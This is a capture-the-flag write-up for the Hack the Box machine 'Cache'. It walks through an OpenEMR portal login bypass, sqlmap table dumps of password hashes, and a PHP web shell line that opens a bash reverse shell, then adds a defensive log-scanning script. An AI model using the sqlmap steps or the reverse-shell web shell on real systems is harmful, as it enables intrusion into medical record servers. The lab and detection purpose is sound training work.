Hack the Box: Cache




Nmap reveals only one attack surface: the webserver:

Nmap scan
Main site
login page
Credentials in js file
OpenEMR login page


The copyright year suggests that OpenEMR is probably version 5.0.1:

OpenEMR version
An unauthenticated user is able to bypass the Patient Portal login simply by navigating to the registration page and modifying the requested URL to access the desired page.
# cat request 
GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=hr2livsbd5ai8c5cmglpme60fi; PHPSESSID=47et9rbfja72qos57se81ea8ha
Upgrade-Insecure-Requests: 1
# sqlmap -r request --tables -v0
| users_facility |
| users_secure |
# sqlmap -r request --dump -T users_secure
Password hash of openemr_admin
Cracking the password hash
Admin interface
Listable /sites
echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'\"); ?>" > /var/www/hms.htb/public_html/sites/tellico.php

User flag

Now, requesting /sites/tellico.php yields a reverse shell:

Reverse shell
User flag
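As an added defender's example (not part of the original write-up), the script below scans constructed Apache-style access-log lines for the two web-side traces this path leaves: SQL metacharacters in parameters of OpenEMR /portal/ pages and a PHP script being served from /sites/. The log lines, IPs, timestamps and the sqlmap version string are made up; note that the bypass request itself (catid=1 from a browser) looks entirely normal.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format log lines modelled on the requests in this
# write-up; IPs, timestamps, sizes and the sqlmap version string are made up.
SAMPLE_LOG = """\
10.10.14.5 - - [05/Jun/2020:10:01:02 +0000] "GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1" 200 1834 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.14.5 - - [05/Jun/2020:10:01:03 +0000] "GET /portal/find_appt_popup_user.php?catid=1%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 1834 "-" "sqlmap/1.x (http://sqlmap.org)"
10.10.14.5 - - [05/Jun/2020:10:02:10 +0000] "GET /sites/tellico.php HTTP/1.1" 200 0 "-" "curl/7.68.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Quotes, comment markers and common SQL keywords/functions inside a parameter value.
SQLI_RE = re.compile(r"(?i)(['\"]|--|/\*|\bunion\b|\bselect\b|\bsleep\(|\bbenchmark\()")

def analyze_line(line):
    """Return the list of alert reasons for one access-log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)
    # Portal pages are reachable before the portal login completes, so an
    # injection attempt shows up in their query parameters (decoded twice to catch double encoding).
    if path.startswith("/portal/"):
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if SQLI_RE.search(unquote(value)):
                reasons.append(f"sql metacharacters in portal parameter {key!r}")
                break
    # /sites/ holds per-site config and uploads, not code: PHP served from there matches the web-shell drop above.
    if path.startswith("/sites/") and path.lower().endswith(".php"):
        reasons.append("php script requested under /sites/")
    if "sqlmap" in m.group("ua").lower():
        reasons.append("sqlmap user-agent")
    return reasons

def analyze_log(text):
    """Return (ip, target, reasons) for every suspicious non-empty line in the log text."""
    alerts = []
    for line in filter(str.strip, text.splitlines()):
        reasons = analyze_line(line)
        m = LOG_RE.match(line)
        if reasons:
            alerts.append((m.group("ip") if m else "?", m.group("target") if m else line, reasons))
    return alerts
```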


User jiffy

Netstat shows that some service is listening locally on port 11211 (memcached):

Netstat result
Listing content of memcached
Reading luffy credentials
Move to luffy

Docker privilege escalation

As seen on the previous screen, luffy is a member of the docker group. Docker can be exploited to spawn a root shell. First I need to find an existing local image:

Listing local docker images
Root flag


